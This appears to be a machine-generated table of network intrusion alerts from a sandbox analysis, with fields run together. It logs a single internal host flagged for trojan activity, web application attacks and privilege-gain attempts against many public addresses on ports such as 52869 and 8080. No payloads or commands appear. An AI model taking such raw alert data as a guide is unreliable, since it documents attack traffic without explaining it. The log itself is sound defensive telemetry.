                            2024-11-28T07:29:11.753465+010020270631Attempted Administrator Privilege Gain192.168.2.235857630.70.91.178080TCP
                            2024-11-28T07:29:11.790790+010020270631Attempted Administrator Privilege Gain192.168.2.23597888.66.52.2108080TCP
                            2024-11-28T07:29:12.681512+010020270631Attempted Administrator Privilege Gain192.168.2.234857637.176.230.2380TCP
                            2024-11-28T07:29:12.722260+010020270631Attempted Administrator Privilege Gain192.168.2.2347522168.216.177.23680TCP
                            2024-11-28T07:29:14.665925+010020270631Attempted Administrator Privilege Gain192.168.2.2339928103.61.153.1208080TCP
                            2024-11-28T07:29:14.790951+010020270631Attempted Administrator Privilege Gain192.168.2.2349378171.191.190.11480TCP
                            2024-11-28T07:29:14.815868+010020270631Attempted Administrator Privilege Gain192.168.2.2337800217.160.23.2580TCP
                            2024-11-28T07:29:14.847079+010020270631Attempted Administrator Privilege Gain192.168.2.2349696119.179.80.1578080TCP
                            2024-11-28T07:29:15.619050+010020270631Attempted Administrator Privilege Gain192.168.2.23589505.197.254.3580TCP
                            2024-11-28T07:29:15.728325+010020270631Attempted Administrator Privilege Gain192.168.2.233782434.173.168.2480TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-28T07:28:09.508432+010020273391A Network Trojan was detected192.168.2.233429897.91.236.20652869TCP
                            2024-11-28T07:28:09.509504+010020273391A Network Trojan was detected192.168.2.2344886101.189.50.3852869TCP
                            2024-11-28T07:28:09.514641+010020273391A Network Trojan was detected192.168.2.233760873.230.184.1952869TCP
                            2024-11-28T07:28:09.517564+010020273391A Network Trojan was detected192.168.2.2349060121.95.76.25052869TCP
                            2024-11-28T07:28:09.556969+010020273391A Network Trojan was detected192.168.2.235338658.189.121.16952869TCP
                            2024-11-28T07:28:09.565198+010020273391A Network Trojan was detected192.168.2.2348832106.222.158.552869TCP
                            2024-11-28T07:28:09.573975+010020273391A Network Trojan was detected192.168.2.2356834152.0.87.20052869TCP
                            2024-11-28T07:28:09.575683+010020273391A Network Trojan was detected192.168.2.2347196100.49.226.16252869TCP
                            2024-11-28T07:28:09.576795+010020273391A Network Trojan was detected192.168.2.236049868.101.86.22752869TCP
                            2024-11-28T07:28:09.577889+010020273391A Network Trojan was detected192.168.2.2334698124.127.132.5752869TCP
                            2024-11-28T07:28:09.578350+010020273391A Network Trojan was detected192.168.2.23472663.111.24.13352869TCP
                            2024-11-28T07:28:09.580120+010020273391A Network Trojan was detected192.168.2.2360268128.39.179.20052869TCP
                            2024-11-28T07:28:09.583055+010020273391A Network Trojan was detected192.168.2.2350614215.230.56.17552869TCP
                            2024-11-28T07:28:09.584518+010020273391A Network Trojan was detected192.168.2.233452668.169.46.18852869TCP
                            2024-11-28T07:28:09.585256+010020273391A Network Trojan was detected192.168.2.233629624.168.141.21052869TCP
                            2024-11-28T07:28:09.586352+010020273391A Network Trojan was detected192.168.2.234627660.61.74.4752869TCP
                            2024-11-28T07:28:09.587816+010020273391A Network Trojan was detected192.168.2.234398685.206.232.11852869TCP
                            2024-11-28T07:28:09.588946+010020273391A Network Trojan was detected192.168.2.2338618126.210.97.15052869TCP
                            2024-11-28T07:28:09.601694+010020273391A Network Trojan was detected192.168.2.2335628178.233.21.10552869TCP
                            2024-11-28T07:28:09.610296+010020273391A Network Trojan was detected192.168.2.2343418132.20.246.25352869TCP
                            2024-11-28T07:28:09.611404+010020273391A Network Trojan was detected192.168.2.2339538111.150.127.17152869TCP
                            2024-11-28T07:28:21.512644+010020273391A Network Trojan was detected192.168.2.233510838.7.77.7152869TCP
                            2024-11-28T07:28:21.513375+010020273391A Network Trojan was detected192.168.2.2346152195.214.23.15652869TCP
                            2024-11-28T07:28:21.552351+010020273391A Network Trojan was detected192.168.2.2344560157.237.189.11952869TCP
                            2024-11-28T07:28:21.553970+010020273391A Network Trojan was detected192.168.2.2337510159.175.193.20752869TCP
                            2024-11-28T07:28:21.556333+010020273391A Network Trojan was detected192.168.2.234939044.237.251.10552869TCP
                            2024-11-28T07:28:21.564582+010020273391A Network Trojan was detected192.168.2.2360674220.112.244.9352869TCP
                            2024-11-28T07:28:21.565316+010020273391A Network Trojan was detected192.168.2.2355736164.49.37.15252869TCP
                            2024-11-28T07:28:21.569392+010020273391A Network Trojan was detected192.168.2.23507709.15.166.12952869TCP
                            2024-11-28T07:28:21.571632+010020273391A Network Trojan was detected192.168.2.2355040217.112.237.23852869TCP
                            2024-11-28T07:28:21.585340+010020273391A Network Trojan was detected192.168.2.2342546110.87.214.8752869TCP
                            2024-11-28T07:28:21.587227+010020273391A Network Trojan was detected192.168.2.2342708110.69.45.22152869TCP
                            2024-11-28T07:28:21.589416+010020273391A Network Trojan was detected192.168.2.236093449.174.147.7252869TCP
                            2024-11-28T07:28:21.594672+010020273391A Network Trojan was detected192.168.2.2356744143.251.2.19852869TCP
                            2024-11-28T07:28:21.595034+010020273391A Network Trojan was detected192.168.2.235938892.61.151.17752869TCP
                            2024-11-28T07:28:21.596156+010020273391A Network Trojan was detected192.168.2.2359942134.101.144.10352869TCP
                            2024-11-28T07:28:21.606492+010020273391A Network Trojan was detected192.168.2.2355058156.94.30.23652869TCP
                            2024-11-28T07:28:21.607585+010020273391A Network Trojan was detected192.168.2.234314461.177.7.9352869TCP
                            2024-11-28T07:28:27.038744+010020273391A Network Trojan was detected192.168.2.235332693.186.174.18052869TCP
                            2024-11-28T07:28:32.510348+010020273391A Network Trojan was detected192.168.2.2348672142.101.125.22552869TCP
                            2024-11-28T07:28:32.517842+010020273391A Network Trojan was detected192.168.2.2343596101.192.66.20152869TCP
                            2024-11-28T07:28:33.516616+010020273391A Network Trojan was detected192.168.2.2359292149.95.199.11152869TCP
                            2024-11-28T07:28:33.535229+010020273391A Network Trojan was detected192.168.2.234159663.102.108.22752869TCP
                            2024-11-28T07:28:33.552982+010020273391A Network Trojan was detected192.168.2.234068866.249.103.22752869TCP
                            2024-11-28T07:28:33.583337+010020273391A Network Trojan was detected192.168.2.233830813.21.253.17452869TCP
                            2024-11-28T07:28:33.594193+010020273391A Network Trojan was detected192.168.2.23516441.58.155.952869TCP
                            2024-11-28T07:28:35.512344+010020273391A Network Trojan was detected192.168.2.235749444.61.47.13852869TCP
                            2024-11-28T07:28:35.514971+010020273391A Network Trojan was detected192.168.2.234977070.243.229.2652869TCP
                            2024-11-28T07:28:39.556042+010020273391A Network Trojan was detected192.168.2.234426679.199.27.10852869TCP
                            2024-11-28T07:28:39.602566+010020273391A Network Trojan was detected192.168.2.2347708203.100.248.5652869TCP
                            2024-11-28T07:28:40.573842+010020273391A Network Trojan was detected192.168.2.233459834.213.210.18052869TCP
                            2024-11-28T07:28:42.563452+010020273391A Network Trojan was detected192.168.2.235511081.190.51.19752869TCP
                            2024-11-28T07:28:42.563855+010020273391A Network Trojan was detected192.168.2.2348712119.101.39.15152869TCP
                            2024-11-28T07:28:43.504933+010020273391A Network Trojan was detected192.168.2.233716029.92.118.20952869TCP
                            2024-11-28T07:28:43.521673+010020273391A Network Trojan was detected192.168.2.234650041.43.231.17552869TCP
                            2024-11-28T07:28:43.528472+010020273391A Network Trojan was detected192.168.2.234304851.247.156.3052869TCP
                            2024-11-28T07:28:43.551494+010020273391A Network Trojan was detected192.168.2.2355180157.239.141.24452869TCP
                            2024-11-28T07:28:47.599170+010020273391A Network Trojan was detected192.168.2.234308839.223.91.15852869TCP
                            2024-11-28T07:28:49.557030+010020273391A Network Trojan was detected192.168.2.2347942221.173.12.19652869TCP
                            2024-11-28T07:28:49.593152+010020273391A Network Trojan was detected192.168.2.2341238142.17.17.1052869TCP
                            2024-11-28T07:28:50.363914+010020273391A Network Trojan was detected192.168.2.2357764125.157.58.652869TCP
                            2024-11-28T07:28:50.516978+010020273391A Network Trojan was detected192.168.2.2341932222.245.158.5552869TCP
                            2024-11-28T07:28:52.510632+010020273391A Network Trojan was detected192.168.2.2344658178.24.36.11352869TCP
                            2024-11-28T07:28:52.517949+010020273391A Network Trojan was detected192.168.2.233668828.188.164.2852869TCP
                            2024-11-28T07:28:52.562638+010020273391A Network Trojan was detected192.168.2.2346634133.74.160.16552869TCP
                            2024-11-28T07:28:52.570782+010020273391A Network Trojan was detected192.168.2.2343014187.247.135.3852869TCP
                            2024-11-28T07:28:53.520880+010020273391A Network Trojan was detected192.168.2.234840427.90.100.16452869TCP
                            2024-11-28T07:28:53.526321+010020273391A Network Trojan was detected192.168.2.2349056133.48.250.9052869TCP
                            2024-11-28T07:28:53.534446+010020273391A Network Trojan was detected192.168.2.2348866101.203.138.4552869TCP
                            2024-11-28T07:28:54.506607+010020273391A Network Trojan was detected192.168.2.2344284111.66.217.9952869TCP
                            2024-11-28T07:28:54.567836+010020273391A Network Trojan was detected192.168.2.2342338204.136.100.10852869TCP
                            2024-11-28T07:28:54.573370+010020273391A Network Trojan was detected192.168.2.233895264.200.234.19552869TCP
                            2024-11-28T07:28:55.526468+010020273391A Network Trojan was detected192.168.2.2343632220.171.241.16452869TCP
                            2024-11-28T07:28:56.585498+010020273391A Network Trojan was detected192.168.2.2340282174.128.4.19352869TCP
                            2024-11-28T07:28:56.585896+010020273391A Network Trojan was detected192.168.2.235502230.218.46.13452869TCP
                            2024-11-28T07:28:56.587448+010020273391A Network Trojan was detected192.168.2.233706426.125.153.652869TCP
                            2024-11-28T07:28:56.588218+010020273391A Network Trojan was detected192.168.2.2359182218.211.40.1952869TCP
                            2024-11-28T07:28:56.597734+010020273391A Network Trojan was detected192.168.2.235421065.121.9.19652869TCP
                            2024-11-28T07:28:58.565488+010020273391A Network Trojan was detected192.168.2.2358724142.106.108.6752869TCP
                            2024-11-28T07:28:59.572102+010020273391A Network Trojan was detected192.168.2.2358134179.253.217.21852869TCP
                            2024-11-28T07:28:59.606587+010020273391A Network Trojan was detected192.168.2.234961249.191.213.8552869TCP
                            2024-11-28T07:29:00.544013+010020273391A Network Trojan was detected192.168.2.23424161.125.226.17452869TCP
                            2024-11-28T07:29:01.598071+010020273391A Network Trojan was detected192.168.2.2350190186.191.62.14652869TCP
                            2024-11-28T07:29:02.543768+010020273391A Network Trojan was detected192.168.2.234810455.105.12.3752869TCP
                            2024-11-28T07:29:02.598535+010020273391A Network Trojan was detected192.168.2.235045470.228.92.21252869TCP
                            2024-11-28T07:29:06.587357+010020273391A Network Trojan was detected192.168.2.2348996110.143.39.11252869TCP
                            2024-11-28T07:29:07.512665+010020273391A Network Trojan was detected192.168.2.2357994143.177.72.12752869TCP
                            2024-11-28T07:29:07.566059+010020273391A Network Trojan was detected192.168.2.2358578129.107.129.25052869TCP
                            2024-11-28T07:29:08.501428+010020273391A Network Trojan was detected192.168.2.2341880124.95.166.23952869TCP
                            2024-11-28T07:29:08.556257+010020273391A Network Trojan was detected192.168.2.2360756119.16.76.13552869TCP
                            2024-11-28T07:29:08.607699+010020273391A Network Trojan was detected192.168.2.2334838120.120.252.14952869TCP
                            2024-11-28T07:29:09.590425+010020273391A Network Trojan was detected192.168.2.2342540161.166.217.9552869TCP
                            2024-11-28T07:29:09.596128+010020273391A Network Trojan was detected192.168.2.2347822204.43.222.7352869TCP
                            2024-11-28T07:29:10.503247+010020273391A Network Trojan was detected192.168.2.234985089.162.48.2252869TCP
                            2024-11-28T07:29:10.506163+010020273391A Network Trojan was detected192.168.2.2349236185.72.198.24952869TCP
                            2024-11-28T07:29:11.547905+010020273391A Network Trojan was detected192.168.2.235366455.43.200.24552869TCP
                            2024-11-28T07:29:11.558233+010020273391A Network Trojan was detected192.168.2.234579230.254.21.17552869TCP
                            2024-11-28T07:29:13.507687+010020273391A Network Trojan was detected192.168.2.2339324101.138.184.6252869TCP
                            2024-11-28T07:29:13.582171+010020273391A Network Trojan was detected192.168.2.234253457.127.194.6252869TCP
                            2024-11-28T07:29:14.582090+010020273391A Network Trojan was detected192.168.2.2351958134.42.195.11452869TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-28T07:28:01.309854+010020300921Web Application Attack192.168.2.2338690177.200.207.5880TCP
                            2024-11-28T07:28:09.517185+010020300921Web Application Attack192.168.2.2332980122.187.139.19080TCP
                            2024-11-28T07:28:09.517913+010020300921Web Application Attack192.168.2.2349366177.120.79.880TCP
                            2024-11-28T07:28:09.521249+010020300921Web Application Attack192.168.2.2352188117.244.40.13480TCP
                            2024-11-28T07:28:09.531008+010020300921Web Application Attack192.168.2.234678497.137.41.21180TCP
                            2024-11-28T07:28:09.538595+010020300921Web Application Attack192.168.2.234644455.164.19.17880TCP
                            2024-11-28T07:28:09.539729+010020300921Web Application Attack192.168.2.235476876.160.156.24280TCP
                            2024-11-28T07:28:09.550269+010020300921Web Application Attack192.168.2.235886095.213.81.2180TCP
                            2024-11-28T07:28:09.563305+010020300921Web Application Attack192.168.2.2355714122.248.149.16580TCP
                            2024-11-28T07:28:09.563673+010020300921Web Application Attack192.168.2.2333160192.97.26.23680TCP
                            2024-11-28T07:28:09.566819+010020300921Web Application Attack192.168.2.2356816107.227.55.14480TCP
                            2024-11-28T07:28:09.568190+010020300921Web Application Attack192.168.2.2350024179.251.32.25180TCP
                            2024-11-28T07:28:09.568935+010020300921Web Application Attack192.168.2.2360514158.166.4.16580TCP
                            2024-11-28T07:28:09.576047+010020300921Web Application Attack192.168.2.2341996161.154.233.9080TCP
                            2024-11-28T07:28:09.590266+010020300921Web Application Attack192.168.2.2357590118.79.188.6780TCP
                            2024-11-28T07:28:09.596002+010020300921Web Application Attack192.168.2.2348870129.46.212.8480TCP
                            2024-11-28T07:28:09.603928+010020300921Web Application Attack192.168.2.2346988157.96.102.1780TCP
                            2024-11-28T07:28:09.612885+010020300921Web Application Attack192.168.2.234965250.196.185.7280TCP
                            2024-11-28T07:28:13.340343+010020300921Web Application Attack192.168.2.2353954202.178.119.16180TCP
                            2024-11-28T07:28:13.515361+010020300921Web Application Attack192.168.2.2339418200.13.149.22380TCP
                            2024-11-28T07:28:21.511922+010020300921Web Application Attack192.168.2.235623286.252.168.1480TCP
                            2024-11-28T07:28:21.513739+010020300921Web Application Attack192.168.2.2336014133.133.78.16580TCP
                            2024-11-28T07:28:21.515221+010020300921Web Application Attack192.168.2.2343430164.167.9.7080TCP
                            2024-11-28T07:28:21.520709+010020300921Web Application Attack192.168.2.23587262.243.56.19980TCP
                            2024-11-28T07:28:21.523657+010020300921Web Application Attack192.168.2.2348998182.151.249.3880TCP
                            2024-11-28T07:28:21.529223+010020300921Web Application Attack192.168.2.2358060148.76.110.16780TCP
                            2024-11-28T07:28:21.530684+010020300921Web Application Attack192.168.2.236021687.41.98.9680TCP
                            2024-11-28T07:28:21.532539+010020300921Web Application Attack192.168.2.235760653.189.162.14280TCP
                            2024-11-28T07:28:21.540611+010020300921Web Application Attack192.168.2.235271622.32.12.20180TCP
                            2024-11-28T07:28:21.542832+010020300921Web Application Attack192.168.2.233334871.241.194.21780TCP
                            2024-11-28T07:28:21.543947+010020300921Web Application Attack192.168.2.233760020.191.233.2480TCP
                            2024-11-28T07:28:21.546184+010020300921Web Application Attack192.168.2.233487011.3.1.17980TCP
                            2024-11-28T07:28:21.546541+010020300921Web Application Attack192.168.2.233695494.134.209.19680TCP
                            2024-11-28T07:28:21.548453+010020300921Web Application Attack192.168.2.235304816.34.243.12580TCP
                            2024-11-28T07:28:21.549948+010020300921Web Application Attack192.168.2.2341894121.122.226.15580TCP
                            2024-11-28T07:28:21.555548+010020300921Web Application Attack192.168.2.235253416.156.233.4780TCP
                            2024-11-28T07:28:21.561666+010020300921Web Application Attack192.168.2.236026279.141.55.10780TCP
                            2024-11-28T07:28:21.563479+010020300921Web Application Attack192.168.2.2353202123.87.2.23780TCP
                            2024-11-28T07:28:21.572726+010020300921Web Application Attack192.168.2.2348936200.60.162.4080TCP
                            2024-11-28T07:28:21.573119+010020300921Web Application Attack192.168.2.2345202175.127.32.9980TCP
                            2024-11-28T07:28:21.578631+010020300921Web Application Attack192.168.2.236075850.82.114.4880TCP
                            2024-11-28T07:28:21.582028+010020300921Web Application Attack192.168.2.2346756220.213.171.15280TCP
                            2024-11-28T07:28:21.588720+010020300921Web Application Attack192.168.2.2345058222.71.55.19780TCP
                            2024-11-28T07:28:21.613042+010020300921Web Application Attack192.168.2.234627626.133.106.5480TCP
                            2024-11-28T07:28:33.537804+010020300921Web Application Attack192.168.2.2357110204.181.118.14680TCP
                            2024-11-28T07:28:33.597471+010020300921Web Application Attack192.168.2.2332980174.184.127.4480TCP
                            2024-11-28T07:28:35.605438+010020300921Web Application Attack192.168.2.235352228.38.73.15380TCP
                            2024-11-28T07:28:39.503692+010020300921Web Application Attack192.168.2.2344322114.50.104.1280TCP
                            2024-11-28T07:28:39.598905+010020300921Web Application Attack192.168.2.233979012.48.123.8780TCP
                            2024-11-28T07:28:40.563951+010020300921Web Application Attack192.168.2.2333470159.88.243.19680TCP
                            2024-11-28T07:28:40.598256+010020300921Web Application Attack192.168.2.235679649.54.129.2080TCP
                            2024-11-28T07:28:40.600107+010020300921Web Application Attack192.168.2.234399280.42.12.7980TCP
                            2024-11-28T07:28:40.607089+010020300921Web Application Attack192.168.2.2343542119.201.115.10480TCP
                            2024-11-28T07:28:40.607461+010020300921Web Application Attack192.168.2.2349990108.121.86.21380TCP
                            2024-11-28T07:28:40.607833+010020300921Web Application Attack192.168.2.2349576193.59.63.13780TCP
                            2024-11-28T07:28:42.566867+010020300921Web Application Attack192.168.2.2350214135.175.75.16680TCP
                            2024-11-28T07:28:42.597078+010020300921Web Application Attack192.168.2.2353568102.14.30.6980TCP
                            2024-11-28T07:28:43.514040+010020300921Web Application Attack192.168.2.2340262188.234.2.18280TCP
                            2024-11-28T07:28:43.519120+010020300921Web Application Attack192.168.2.234344474.23.91.7680TCP
                            2024-11-28T07:28:43.537243+010020300921Web Application Attack192.168.2.2355988126.211.100.6580TCP
                            2024-11-28T07:28:44.527247+010020300921Web Application Attack192.168.2.23497168.175.157.12680TCP
                            2024-11-28T07:28:47.573135+010020300921Web Application Attack192.168.2.2341040156.26.16.13680TCP
                            2024-11-28T07:28:47.592450+010020300921Web Application Attack192.168.2.2333724198.217.213.3880TCP
                            2024-11-28T07:28:47.593913+010020300921Web Application Attack192.168.2.235101622.97.50.10580TCP
                            2024-11-28T07:28:49.587290+010020300921Web Application Attack192.168.2.2335836220.208.144.3480TCP
                            2024-11-28T07:28:50.593006+010020300921Web Application Attack192.168.2.2343188140.43.141.18980TCP
                            2024-11-28T07:28:51.561027+010020300921Web Application Attack192.168.2.2334172157.246.210.7180TCP
                            2024-11-28T07:28:51.601624+010020300921Web Application Attack192.168.2.233726039.5.42.3580TCP
                            2024-11-28T07:28:52.518329+010020300921Web Application Attack192.168.2.2344932170.86.222.19480TCP
                            2024-11-28T07:28:52.586761+010020300921Web Application Attack192.168.2.2358350159.209.117.21680TCP
                            2024-11-28T07:28:54.559757+010020300921Web Application Attack192.168.2.2358140143.80.92.3780TCP
                            2024-11-28T07:28:55.505373+010020300921Web Application Attack192.168.2.2347254170.189.236.3980TCP
                            2024-11-28T07:28:55.577093+010020300921Web Application Attack192.168.2.2359866211.138.21.1980TCP
                            2024-11-28T07:28:55.598049+010020300921Web Application Attack192.168.2.235476429.239.31.16180TCP
                            2024-11-28T07:28:56.523677+010020300921Web Application Attack192.168.2.234495431.231.192.6180TCP
                            2024-11-28T07:28:56.598148+010020300921Web Application Attack192.168.2.2341222176.37.130.580TCP
                            2024-11-28T07:29:00.555685+010020300921Web Application Attack192.168.2.2337988120.175.236.3880TCP
                            2024-11-28T07:29:02.530841+010020300921Web Application Attack192.168.2.2352754176.1.96.11780TCP
                            2024-11-28T07:29:02.589368+010020300921Web Application Attack192.168.2.2341182106.218.209.5780TCP
                            2024-11-28T07:29:03.555686+010020300921Web Application Attack192.168.2.2346966200.6.145.22980TCP
                            2024-11-28T07:29:03.582490+010020300921Web Application Attack192.168.2.23548242.199.234.24880TCP
                            2024-11-28T07:29:04.565729+010020300921Web Application Attack192.168.2.2357798118.35.71.13880TCP
                            2024-11-28T07:29:04.581845+010020300921Web Application Attack192.168.2.2357404164.216.166.2480TCP
                            2024-11-28T07:29:05.601854+010020300921Web Application Attack192.168.2.23426421.96.199.12580TCP
                            2024-11-28T07:29:07.501702+010020300921Web Application Attack192.168.2.2339196109.43.118.11080TCP
                            2024-11-28T07:29:07.524983+010020300921Web Application Attack192.168.2.2338390189.55.0.25480TCP
                            2024-11-28T07:29:07.599357+010020300921Web Application Attack192.168.2.234350233.236.32.14480TCP
                            2024-11-28T07:29:07.604497+010020300921Web Application Attack192.168.2.2354832101.251.159.16780TCP
                            2024-11-28T07:29:08.550980+010020300921Web Application Attack192.168.2.2337214188.5.181.4180TCP
                            2024-11-28T07:29:08.551392+010020300921Web Application Attack192.168.2.2342422102.116.67.980TCP
                            2024-11-28T07:29:11.512245+010020300921Web Application Attack192.168.2.235697267.28.77.20580TCP
                            2024-11-28T07:29:11.543468+010020300921Web Application Attack192.168.2.233621852.95.18.14380TCP
                            2024-11-28T07:29:14.603650+010020300921Web Application Attack192.168.2.233694448.235.98.9380TCP
                            2024-11-28T07:29:15.503515+010020300921Web Application Attack192.168.2.2357530175.166.167.20880TCP
                            2024-11-28T07:29:15.553852+010020300921Web Application Attack192.168.2.2341082152.141.41.15380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-28T07:28:00.977945+010020290341Web Application Attack192.168.2.2345422158.228.53.1697574TCP
                            2024-11-28T07:28:01.057863+010020290341Web Application Attack192.168.2.2358364108.165.239.2518080TCP
                            2024-11-28T07:28:01.309854+010020290341Web Application Attack192.168.2.2338690177.200.207.5880TCP
                            2024-11-28T07:28:01.461820+010020290341Web Application Attack192.168.2.2357246119.215.99.1565555TCP
                            2024-11-28T07:28:09.507681+010020290341Web Application Attack192.168.2.235262452.116.215.21080TCP
                            2024-11-28T07:28:09.510326+010020290341Web Application Attack192.168.2.2340018175.170.71.15549152TCP
                            2024-11-28T07:28:09.510606+010020290341Web Application Attack192.168.2.2344862214.89.56.22980TCP
                            2024-11-28T07:28:09.512442+010020290341Web Application Attack192.168.2.2352432159.99.163.1117574TCP
                            2024-11-28T07:28:09.513175+010020290341Web Application Attack192.168.2.233406664.173.83.1705555TCP
                            2024-11-28T07:28:09.513546+010020290341Web Application Attack192.168.2.2356088186.96.78.18649152TCP
                            2024-11-28T07:28:09.514267+010020290341Web Application Attack192.168.2.2359688166.249.145.1605555TCP
                            2024-11-28T07:28:09.515001+010020290341Web Application Attack192.168.2.233408675.89.77.20680TCP
                            2024-11-28T07:28:09.515372+010020290341Web Application Attack192.168.2.2350660114.117.212.449152TCP
                            2024-11-28T07:28:09.515733+010020290341Web Application Attack192.168.2.2348846114.17.69.1815555TCP
                            2024-11-28T07:28:09.516815+010020290341Web Application Attack192.168.2.235503035.184.146.11849152TCP
                            2024-11-28T07:28:09.517185+010020290341Web Application Attack192.168.2.2332980122.187.139.19080TCP
                            2024-11-28T07:28:09.517913+010020290341Web Application Attack192.168.2.2349366177.120.79.880TCP
                            2024-11-28T07:28:09.518651+010020290341Web Application Attack192.168.2.2344448203.238.209.215555TCP
                            2024-11-28T07:28:09.519020+010020290341Web Application Attack192.168.2.2352900143.207.148.5449152TCP
                            2024-11-28T07:28:09.521249+010020290341Web Application Attack192.168.2.2352188117.244.40.13480TCP
                            2024-11-28T07:28:09.521646+010020290341Web Application Attack192.168.2.2348626107.201.204.12449152TCP
                            2024-11-28T07:28:09.522399+010020290341Web Application Attack192.168.2.2358462170.20.179.2318080TCP
                            2024-11-28T07:28:09.523891+010020290341Web Application Attack192.168.2.2345596158.60.86.2187574TCP
                            2024-11-28T07:28:09.524270+010020290341Web Application Attack192.168.2.2343880191.213.172.777574TCP
                            2024-11-28T07:28:09.526156+010020290341Web Application Attack192.168.2.2339428163.197.220.20349152TCP
                            2024-11-28T07:28:09.526519+010020290341Web Application Attack192.168.2.234831238.198.165.697574TCP
                            2024-11-28T07:28:09.526898+010020290341Web Application Attack192.168.2.236060828.115.34.20780TCP
                            2024-11-28T07:28:09.528801+010020290341Web Application Attack192.168.2.234015499.216.95.1665555TCP
                            2024-11-28T07:28:09.531008+010020290341Web Application Attack192.168.2.234678497.137.41.21180TCP
                            2024-11-28T07:28:09.531385+010020290341Web Application Attack192.168.2.2345114171.119.20.11849152TCP
                            2024-11-28T07:28:09.531740+010020290341Web Application Attack192.168.2.235942436.64.74.20349152TCP
                            2024-11-28T07:28:09.532122+010020290341Web Application Attack192.168.2.2346996136.27.141.238080TCP
                            2024-11-28T07:28:09.532518+010020290341Web Application Attack192.168.2.2357430109.90.191.1758080TCP
                            2024-11-28T07:28:09.534036+010020290341Web Application Attack192.168.2.235702424.158.93.2358080TCP
                            2024-11-28T07:28:09.534786+010020290341Web Application Attack192.168.2.2346042193.206.30.2108080TCP
                            2024-11-28T07:28:09.535554+010020290341Web Application Attack192.168.2.2359610103.210.62.10380TCP
                            2024-11-28T07:28:09.536317+010020290341Web Application Attack192.168.2.2345072209.161.87.328080TCP
                            2024-11-28T07:28:09.537078+010020290341Web Application Attack192.168.2.235021268.10.114.2480TCP
                            2024-11-28T07:28:09.537833+010020290341Web Application Attack192.168.2.233741444.153.13.580TCP
                            2024-11-28T07:28:09.538212+010020290341Web Application Attack192.168.2.236077615.182.172.185555TCP
                            2024-11-28T07:28:09.538595+010020290341Web Application Attack192.168.2.234644455.164.19.17880TCP
                            2024-11-28T07:28:09.539011+010020290341Web Application Attack192.168.2.2349042142.0.210.2538080TCP
                            2024-11-28T07:28:09.539729+010020290341Web Application Attack192.168.2.235476876.160.156.24280TCP
                            2024-11-28T07:28:09.540491+010020290341Web Application Attack192.168.2.2346302187.46.100.11180TCP
                            2024-11-28T07:28:09.542791+010020290341Web Application Attack192.168.2.2338284203.108.157.20349152TCP
                            2024-11-28T07:28:09.543332+010020290341Web Application Attack192.168.2.235428497.116.126.1717574TCP
                            2024-11-28T07:28:09.543964+010020290341Web Application Attack192.168.2.2344394152.145.133.637574TCP
                            2024-11-28T07:28:09.544384+010020290341Web Application Attack192.168.2.2354816167.138.9.25180TCP
                            2024-11-28T07:28:09.545445+010020290341Web Application Attack192.168.2.235446440.134.41.14780TCP
                            2024-11-28T07:28:09.546572+010020290341Web Application Attack192.168.2.2350630205.138.223.895555TCP
                            2024-11-28T07:28:09.547321+010020290341Web Application Attack192.168.2.2349770178.81.166.1995555TCP
                            2024-11-28T07:28:09.547928+010020290341Web Application Attack192.168.2.23536189.27.194.1498080TCP
                            2024-11-28T07:28:09.548458+010020290341Web Application Attack192.168.2.2337136197.96.116.13580TCP
                            2024-11-28T07:28:09.549912+010020290341Web Application Attack192.168.2.2345848131.57.28.1818080TCP
                            2024-11-28T07:28:09.550269+010020290341Web Application Attack192.168.2.235886095.213.81.2180TCP
                            2024-11-28T07:28:09.551360+010020290341Web Application Attack192.168.2.2344056221.66.59.1357574TCP
                            2024-11-28T07:28:09.553545+010020290341Web Application Attack192.168.2.2341324142.172.142.8749152TCP
                            2024-11-28T07:28:09.554334+010020290341Web Application Attack192.168.2.234522211.190.108.11780TCP
                            2024-11-28T07:28:09.554696+010020290341Web Application Attack192.168.2.2338934140.221.39.24280TCP
                            2024-11-28T07:28:09.555814+010020290341Web Application Attack192.168.2.2333862113.94.133.1707574TCP
                            2024-11-28T07:28:09.556589+010020290341Web Application Attack192.168.2.234265626.11.196.705555TCP
                            2024-11-28T07:28:09.557706+010020290341Web Application Attack192.168.2.233729035.200.178.135555TCP
                            2024-11-28T07:28:09.559213+010020290341Web Application Attack192.168.2.235315232.54.226.307574TCP
                            2024-11-28T07:28:09.559992+010020290341Web Application Attack192.168.2.23466447.29.11.1325555TCP
                            2024-11-28T07:28:09.561071+010020290341Web Application Attack192.168.2.235678655.77.110.1377574TCP
                            2024-11-28T07:28:09.561447+010020290341Web Application Attack192.168.2.233426230.84.48.13080TCP
                            2024-11-28T07:28:09.561814+010020290341Web Application Attack192.168.2.2349462171.23.177.24049152TCP
                            2024-11-28T07:28:09.562622+010020290341Web Application Attack192.168.2.234246096.204.93.2465555TCP
                            2024-11-28T07:28:09.562937+010020290341Web Application Attack192.168.2.23341586.205.85.15849152TCP
                            2024-11-28T07:28:09.563305+010020290341Web Application Attack192.168.2.2355714122.248.149.16580TCP
                            2024-11-28T07:28:09.563673+010020290341Web Application Attack192.168.2.2333160192.97.26.23680TCP
                            2024-11-28T07:28:09.564781+010020290341Web Application Attack192.168.2.233459225.75.205.1735555TCP
                            2024-11-28T07:28:09.566688+010020290341Web Application Attack192.168.2.2345012137.62.189.19380TCP
                            2024-11-28T07:28:09.566819+010020290341Web Application Attack192.168.2.2356816107.227.55.14480TCP
                            2024-11-28T07:28:09.567069+010020290341Web Application Attack192.168.2.2341512209.219.134.77574TCP
                            2024-11-28T07:28:09.567821+010020290341Web Application Attack192.168.2.234881059.230.90.1605555TCP
                            2024-11-28T07:28:09.568190+010020290341Web Application Attack192.168.2.2350024179.251.32.25180TCP
                            2024-11-28T07:28:09.568935+010020290341Web Application Attack192.168.2.2360514158.166.4.16580TCP
                            2024-11-28T07:28:09.568935+010020290341Web Application Attack192.168.2.235308868.228.150.778080TCP
                            2024-11-28T07:28:09.569310+010020290341Web Application Attack192.168.2.234926255.92.215.8380TCP
                            2024-11-28T07:28:09.570433+010020290341Web Application Attack192.168.2.2354916167.15.35.2467574TCP
                            2024-11-28T07:28:09.570809+010020290341Web Application Attack192.168.2.2352194134.224.138.247574TCP
                            2024-11-28T07:28:09.571330+010020290341Web Application Attack192.168.2.234073631.23.54.2087574TCP
                            2024-11-28T07:28:09.571564+010020290341Web Application Attack192.168.2.2354474170.93.179.1787574TCP
